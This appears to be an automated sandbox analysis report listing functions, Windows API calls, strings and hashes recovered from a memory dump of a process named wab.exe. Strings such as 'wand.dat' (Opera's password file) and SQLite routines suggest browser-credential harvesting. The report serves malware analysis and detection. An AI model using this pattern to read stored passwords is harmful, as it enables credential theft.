                  • String ID: foreign key constraint failed$new$oid$old
                  • API String ID: 0-1953309616
                  • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                  • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                  • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                  • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                  Strings
                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                  • API String ID: 3510742995-272990098
                  • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                  • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                  • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                  • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: gj
                  • API String ID: 1297977491-4203073231
                  • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                  • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                  • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                  • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                  APIs
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                  • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                  • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                  • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                  APIs
                  • AreFileApisANSI.KERNEL32 ref: 00417497
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                  • malloc.MSVCRT ref: 004174BD
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                  • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                  • String ID:
                  • API String ID: 2903831945-0
                  • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                  • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                  • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                  • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                  APIs
                  • GetParent.USER32(?), ref: 0040D453
                  • GetWindowRect.USER32(?,?), ref: 0040D460
                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$Rect$ClientParentPoints
                  • String ID:
                  • API String ID: 4247780290-0
                  • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                  • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                  • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                  • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                  APIs
                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                  • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                  • memset.MSVCRT ref: 004450CD
                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                  • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                  • String ID:
                  • API String ID: 1471605966-0
                  • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                  • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                  APIs
                  • wcscpy.MSVCRT ref: 0044475F
                  • wcscat.MSVCRT ref: 0044476E
                  • wcscat.MSVCRT ref: 0044477F
                  • wcscat.MSVCRT ref: 0044478E
                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                  • String ID: \StringFileInfo\
                  • API String ID: 102104167-2245444037
                  • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                  • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                  • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                  • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                  • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                  • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                  • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$??3@
                  • String ID: g4@
                  • API String ID: 3314356048-2133833424
                  • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                  • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _memicmpwcslen
                  • String ID: @@@@$History
                  • API String ID: 1872909662-685208920
                  • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                  • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                  • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                  • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                  APIs
                  • memset.MSVCRT ref: 004100FB
                  • memset.MSVCRT ref: 00410112
                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                  • _snwprintf.MSVCRT ref: 00410141
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_snwprintf_wcslwrwcscpy
                  • String ID: </%s>
                  • API String ID: 3400436232-259020660
                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                  APIs
                  • memset.MSVCRT ref: 0040D58D
                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ChildEnumTextWindowWindowsmemset
                  • String ID: caption
                  • API String ID: 1523050162-4135340389
                  • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                  • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                  • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                  • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                  APIs
                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                  • String ID: MS Sans Serif
                  • API String ID: 210187428-168460110
                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ClassName_wcsicmpmemset
                  • String ID: edit
                  • API String ID: 2747424523-2167791130
                  • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                  • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                  • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                  • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                  • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                  • String ID: SHAutoComplete$shlwapi.dll
                  • API String ID: 3150196962-1506664499
                  • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                  • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                  • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                  • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memcmp
                  • String ID:
                  • API String ID: 3384217055-0
                  • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                  • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                  • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                  • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                  • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                  • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                  • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                  APIs
                    • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                    • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                    • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                  • GetMenu.USER32(?), ref: 00410F8D
                  • GetSubMenu.USER32(00000000), ref: 00410F9A
                  • GetSubMenu.USER32(00000000), ref: 00410F9D
                  • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Menu$ItemMessageSend$CheckEnableRadio
                  • String ID:
                  • API String ID: 1889144086-0
                  • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                  • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                  • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                  • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                  APIs
                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                  • GetLastError.KERNEL32 ref: 0041810A
                  • CloseHandle.KERNEL32(00000000), ref: 00418120
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$CloseCreateErrorHandleLastMappingView
                  • String ID:
                  • API String ID: 1661045500-0
                  • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                  • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                  • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                  • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                  APIs
                    • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                  • memcpy.MSVCRT ref: 0042EC7A
                  Strings
                  • Cannot add a column to a view, xrefs: 0042EBE8
                  • virtual tables may not be altered, xrefs: 0042EBD2
                  • sqlite_altertab_%s, xrefs: 0042EC4C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                  • API String ID: 1297977491-2063813899
                  • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                  • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                  • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                  • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                  APIs
                  • memset.MSVCRT ref: 0040560C
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                  • String ID: *.*$dat$wand.dat
                  • API String ID: 2618321458-1828844352
                  • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                  • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                  APIs
                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                  • wcslen.MSVCRT ref: 00410C74
                  • _wtoi.MSVCRT ref: 00410C80
                  • _wcsicmp.MSVCRT ref: 00410CCE
                  • _wcsicmp.MSVCRT ref: 00410CDF
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                  • String ID:
                  • API String ID: 1549203181-0
                  • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                  • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                  • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                  • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                  APIs
                  • memset.MSVCRT ref: 00412057
                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                  • GetKeyState.USER32(00000010), ref: 0041210D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                  • String ID:
                  • API String ID: 3550944819-0
                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                  APIs
                  • wcslen.MSVCRT ref: 0040A8E2
                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                  • memcpy.MSVCRT ref: 0040A94F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$memcpy$mallocwcslen
                  • String ID:
                  • API String ID: 3023356884-0
                  • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                  • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                  APIs
                  • wcslen.MSVCRT ref: 0040B1DE
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                  • memcpy.MSVCRT ref: 0040B248
